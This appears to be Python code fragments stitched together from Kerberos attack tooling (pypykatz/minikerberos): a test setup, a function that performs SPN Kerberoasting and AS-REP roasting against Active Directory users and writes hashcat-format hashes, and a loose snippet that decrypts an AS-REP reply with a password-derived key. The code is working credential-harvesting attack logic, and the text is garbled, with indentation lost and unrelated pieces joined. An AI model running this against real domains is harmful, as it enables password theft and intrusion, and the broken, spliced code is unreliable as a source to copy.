def setUp(self):
self.username = '******'
self.domain = 'TEST.corp'
self.password = '******'
self.target_ip = '192.168.9.1'
self.target_user = None
self.target_service = None
self.kerberos_socet = KerberosSocket(self.target_ip)
def run_live(self, args):
from winsspi.sspi import KerberoastSSPI
from minikerberos.security import TGSTicket2hashcat, APREPRoast
from minikerberos.utils import TGTTicket2hashcat
from minikerberos.communication import KerberosSocket
from minikerberos.common import KerberosTarget
from pypykatz.commons.winapi.machine import LiveMachine
if not args.target_file and not args.target_user:
raise Exception(
'No targets loaded! Either -u or -t MUST be specified!')
machine = LiveMachine()
realm = args.realm
if not args.realm:
realm = machine.get_domain()
if args.cmd in ['spnroast', 'asreproast']:
targets = []
if args.target_file:
with open(args.target_file, 'r') as f:
for line in f:
line = line.strip()
domain = None
username = None
if line.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = line.split('/')
else:
username = line
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
if args.target_user:
for user in args.target_user:
domain = None
username = None
if user.find('/') != -1:
#we take for granted that usernames do not have the char / in them!
domain, username = user.split('/')
else:
username = user
if args.realm:
domain = args.realm
else:
if domain is None:
raise Exception(
'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
)
target = KerberosTarget()
target.username = username
target.domain = domain
targets.append(target)
results = []
errors = []
if args.cmd == 'spnroast':
for spn_name in targets:
ksspi = KerberoastSSPI()
try:
ticket = ksspi.get_ticket_for_spn(
spn_name.get_formatted_pname())
except Exception as e:
errors.append((spn_name, e))
continue
results.append(TGSTicket2hashcat(ticket))
elif args.cmd == 'asreproast':
dcip = args.dc_ip
if args.dc_ip is None:
dcip = machine.get_domain()
ks = KerberosSocket(dcip)
ar = APREPRoast(ks)
results = ar.run(targets)
if args.out_file:
with open(args.out_file, 'w') as f:
for thash in results:
f.write(thash + '\r\n')
else:
for thash in results:
print(thash)
for err in errors:
print('Failed to get ticket for %s. Reason: %s' %
(err[0], err[1]))
logging.info('SSPI based Kerberoast complete')
from minikerberos.communication import KerberosSocket
from minikerberos.security import APREPRoast
from minikerberos.encryption import _enctype_table, Key
from minikerberos.asn1_structs import EncASRepPart
ccred = KerberosCredential()
ccred.username = '******'
ccred.domain = 'TEST.corp'
ccred2 = KerberosCredential()
ccred2.username = '******'
ccred2.domain = 'TEST.corp'
creds = [ccred, ccred2]
ks = KerberosSocket('192.168.9.1')
ar = APREPRoast(ks)
res = ar.run(creds)
rep = res[0]
print(res)
x, a, enctype, checksum, data = rep.split('$')
password = '******'
cipher = _enctype_table[int(enctype)]
key = Key(int(enctype),
hashlib.new('md4', password.encode('utf-16-le')).digest())
cipherText = bytes.fromhex(checksum + data)
temp = cipher.decrypt(key, 3, cipherText)